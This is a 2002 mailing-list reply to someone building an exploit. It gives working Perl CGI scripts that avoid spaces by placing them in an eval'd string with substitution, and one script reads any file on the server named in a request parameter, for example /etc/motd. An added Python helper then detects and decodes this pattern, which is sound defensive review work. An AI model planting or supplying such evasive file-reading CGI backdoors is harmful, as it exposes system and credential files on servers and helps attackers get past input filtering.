From: Justin Lavoie <acid_rainat_private>
Date: Mon, 10 Jun 2002 00:27:05 -0500
Subject: Coding Conservative CGI Perl

}I'm working on a type of exploit and in doing so I must develop a *.cgi
}file that'd run on a Linux and Windows box to allow me to read or upload
}file (whatever is possible) without the use of spaces!

Well, what would be wrong with:

--- O< ---
#!/usr/bin/perl
$g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
--- O< ---

Or, to, say, read any file on a system:

--- O< ---
#!/usr/bin/perl
$g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n");
print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
--- O< ---

(change the MIME type as necessary) and call with .cgi?file=/etc/motd

In this case, you'd replace every space with a * between the two hash
marks, and you would have to escape any hash mark or backslash you had,
but as you'll notice, you can do anything you'd like and have it convert
on the fly.  You could even change the * to any other character if you'd
like.

Perl is very forgiving about most environments, and you can get around
most restrictions if you try.

-Pete K

--
Pete Krawczyk
petek at bsod dot net
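The trick above (a q-quoted string with a placeholder for every space, translated with s///e and fed to eval) is also a recognizable shape for anyone reviewing CGI scripts that turned up in an upload directory. The following Python is an added triage helper, not part of the post or of any project: it looks for a `s/<char>/chr(32)/` substitution next to an `eval(`, recovers the q-literal, and undoes the substitution so a reviewer can read what the script actually does. It generalizes past the post's `*` to any single placeholder character and any q-delimiter, as the post says one may choose. The sample inputs are constructed for this example (the obfuscated one is the post's first, harmless "Test: foo!" script, not its file reader), and the regexes are a heuristic, not a Perl parser.

```python
import re

# Constructed sample inputs (not files from the post): an ordinary CGI and one
# written in the space-free style the post describes, where every space of the
# real program is a '*' inside a q#...# string that is translated and eval'd.
PLAIN_CGI = (
    '#!/usr/bin/perl\n'
    'print "Content-type: text/plain\\n\\n";\n'
    'print "hello\\n";\n'
)
SPACELESS_CGI = (
    '#!/usr/bin/perl\n'
    '$g=q#print*"Content-type:*text/plain\\n\\n";print*"Test:*foo!\\n";#;\n'
    '$g=~s/\\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);\n'
)

# s/<one char>/chr(32)/ (or a literal space) with any trailing flags.
SPACE_SUBST_RE = re.compile(r's/\\?(.)/(?:chr\(32\)|\x20|" ")/[a-z]*')
# A q<delim>...<delim> literal; the lookbehind keeps '$q' and 'eq' from matching.
Q_LITERAL_RE = re.compile(r"(?<![\w$@%])q([^\w\s])(.*?)\1", re.DOTALL)
EVAL_RE = re.compile(r"\beval\s*\(")


def find_space_placeholder(src):
    """Return the character the script substitutes for spaces, or None."""
    m = SPACE_SUBST_RE.search(src)
    return m.group(1) if m else None


def extract_q_literal(src):
    """Return the body of the first q-quoted string literal, or None."""
    m = Q_LITERAL_RE.search(src)
    return m.group(2) if m else None


def deobfuscate(src):
    """Undo the placeholder-for-space trick and return the real program text."""
    placeholder = find_space_placeholder(src)
    body = extract_q_literal(src)
    if placeholder is None or body is None:
        return None
    return body.replace(placeholder, " ")


def analyze(src):
    """Summarize the indicators a reviewer wants for one CGI source file."""
    placeholder = find_space_placeholder(src)
    uses_eval = EVAL_RE.search(src) is not None
    return {
        "uses_eval": uses_eval,
        "space_placeholder": placeholder,
        # Substitution-then-eval is the signature; either alone is common Perl.
        "suspicious": uses_eval and placeholder is not None,
        "decoded": deobfuscate(src),
    }


if __name__ == "__main__":
    for name, src in (("plain", PLAIN_CGI), ("spaceless", SPACELESS_CGI)):
        print(name, analyze(src))
```

Run it over each `.cgi` in a suspect directory and act on the `decoded` text rather than the raw file; the post's own hint that the placeholder can be any character is why the detector captures the substituted character instead of hard-coding `*`.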